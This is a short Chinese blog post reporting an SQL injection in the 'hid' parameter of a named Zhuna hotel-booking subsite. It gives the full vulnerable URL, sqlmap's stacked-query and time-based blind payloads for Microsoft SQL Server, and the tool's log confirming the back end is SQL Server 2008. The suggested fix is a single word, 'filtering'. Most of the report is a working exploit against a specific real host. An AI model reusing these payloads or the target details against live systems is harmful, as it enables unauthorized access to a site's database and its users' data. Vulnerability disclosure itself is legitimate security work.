住哪网某分站SQL注入存在注入的地址:
http://www.api.zhuna.cn/e/b.php?agent_id=4159415&agent_md=4ce1f950fbc331f9&uid=0&hid=23078&rid=613489&pid=108191&tm1=2014-09-25&tm2=2014-09-26&style=970,aacbee,e0f5fc,295574&webpath=www.qufou.com#e5e3378c-05da-737f-4649-0aa20fdf4d59其中hid参数存在注入
sqlmap identified the following injection points with a total of 60 HTTP(s) requests:
—
Place: GET
Parameter: hid
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: agent_id=4159415&agent_md=4ce1f950fbc331f9&uid=0&hid=23078; WAITFOR DELAY ‘0:0:5’–&rid=613489&pid=108191&tm1=2014-09-25&tm2=2014-09-26&style=970,aacbee,e0f5fc,295574&webpath=www.qufou.com
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: agent_id=4159415&agent_md=4ce1f950fbc331f9&uid=0&hid=23078 WAITFOR DELAY ‘0:0:5’–&rid=613489&pid=108191&tm1=2014-09-25&tm2=2014-09-26&style=970,aacbee,e0f5fc,295574&webpath=www.qufou.com
—
[22:19:55] [INFO] testing Microsoft SQL Server
[22:19:55] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[22:20:01] [INFO] confirming Microsoft SQL Server
[22:20:18] [INFO] the back-end DBMS is Microsoft SQL Server
back-end DBMS: Microsoft SQL Server 2008
[22:20:18] [INFO] fetched data logged to text files under ‘/usr/share/sqlmap/output/www.api.zhuna.cn’
过滤
修复方案:
微信扫一扫,打赏作者吧~转载请注明:苏demo的别样人生 » 住哪网某分站SQL注入
